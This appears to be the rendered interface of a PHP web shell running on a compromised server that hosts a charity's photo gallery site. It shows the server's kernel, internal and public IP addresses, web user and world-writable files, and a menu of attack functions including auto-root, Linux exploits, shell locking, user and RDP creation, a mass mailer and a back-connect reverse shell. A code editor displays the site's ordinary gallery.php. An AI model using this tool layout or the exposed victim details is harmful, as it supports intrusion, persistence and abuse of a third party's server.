Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.133.155.253
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
website /
bkmh /
bkmh_gallery /
[ HOME SHELL ]
Name
Size
Permission
Action
IPMS
[ DIR ]
drwxrwsrwx
css
[ DIR ]
drwxrwsrwx
cuk
[ DIR ]
drwxrwsrwx
gallery
[ DIR ]
drwxrwsrwx
img
[ DIR ]
drwxrwsrwx
js
[ DIR ]
drwxrwsrwx
.DS_Store
6
KB
-rwxrwxrwx
IPMS.zip
330.36
KB
-rwxrwxrwx
gallery.php
3.19
KB
-rwxrwxrwx
index copy.html
6.74
KB
-rwxrwxrwx
index.html
4.34
KB
-rwxrwxrwx
index_copy.html
16.04
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : gallery.php
<!DOCTYPE html> <html lang="zxx"> <head> <title>BKMH</title> <meta charset="UTF-8"> <meta name="description" content="Boto Photo Studio HTML Template"> <meta name="keywords" content="photo, html"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <!-- Stylesheets --> <link rel="stylesheet" href="css/bootstrap.min.css"/> <link rel="stylesheet" href="css/font-awesome.min.css"/> <link rel="stylesheet" href="css/slicknav.min.css"/> <link rel="stylesheet" href="css/fresco.css"/> <link href="cuk/bootstrap.min.css" type="text/css" rel="stylesheet"> <link href="cuk/common-styles.css" type="text/css" rel="stylesheet"> <link href="cuk/center-styles.css" rel="stylesheet"> <link href="cuk/center-responsive.css" type="text/css" rel="stylesheet"> <link href="cuk/common-responsive.css" type="text/css" rel="stylesheet"> <link href="cuk/line-awesome.min.css" type="text/css" rel="stylesheet"> <link href="cuk/font-awesome.min.css" type="text/css" rel="stylesheet"> <link href="cuk/nav-bars_1.css" type="text/css" rel="stylesheet"> <link href="cuk/nav-bars_2.css" type="text/css" rel="stylesheet"> <!-- Main Stylesheets --> <link rel="stylesheet" href="css/style.css"/> </head> <body data-new-gr-c-s-check-loaded="14.1075.0" data-gr-ext-installed="" style="cursor: auto;"> <div class="headerr sticky" id="myHeader"> <div class="headerr sticky" id="myHeader"> <div class="to-p-hde-r"> <section id="header-logo"> <div class="container-fluid max-w"> <div class="col-lg-7 col-sm-7"> <img src="../images/bkmhlogo2.png" style="width: 50px; height:50px;"> B.K. Mariappa's Charities</div> <div class="col-lg-9 col-sm-9"> <div class="first-menu"> <div id="cssmenu"><div id="menu-button"></div> <ul style="display: none;"> <li><a target="_blank"> <i class="fa fa-graduation-cap"></i> <span class="txt-top-mnu"> Home </span> </a></li> </ul> </div> </div> </div> </div> </section> <section id="updates"> </section> </div> </div> </div> <div class="site-all-content" id="brd-crmp-depp_new" style="scroll-margin-top: 65px !important;"> <!-- Header Section end --> <!-- About Page --> <div class="gallery__page"> <div class="gallery__warp"> <div class="row"> <?php foreach (glob("../snehasam24/*.*") as $filename) { ?> <div class="col-lg-3 col-md-4 col-sm-6"> <a class="gallery__item fresco" href="<?php echo $filename; ?>" data-fresco-group="gallery"> <img src="<?php echo $filename;?>" alt=""> </a> </div> <?php } ?> </div> </div> </div> <div class="search-model"> <div class="h-100 d-flex align-items-center justify-content-center"> <div class="search-close-switch">+</div> <form class="search-model-form"> <input type="text" id="search-input" placeholder="Search here....."> </form> </div> </div> <!--====== Javascripts & Jquery ======--> <script src="js/vendor/jquery-3.2.1.min.js"></script> <script src="js/jquery.slicknav.min.js"></script> <script src="js/slick.min.js"></script> <script src="js/fresco.min.js"></script> <script src="js/main.js"></script> </body> </html>
Close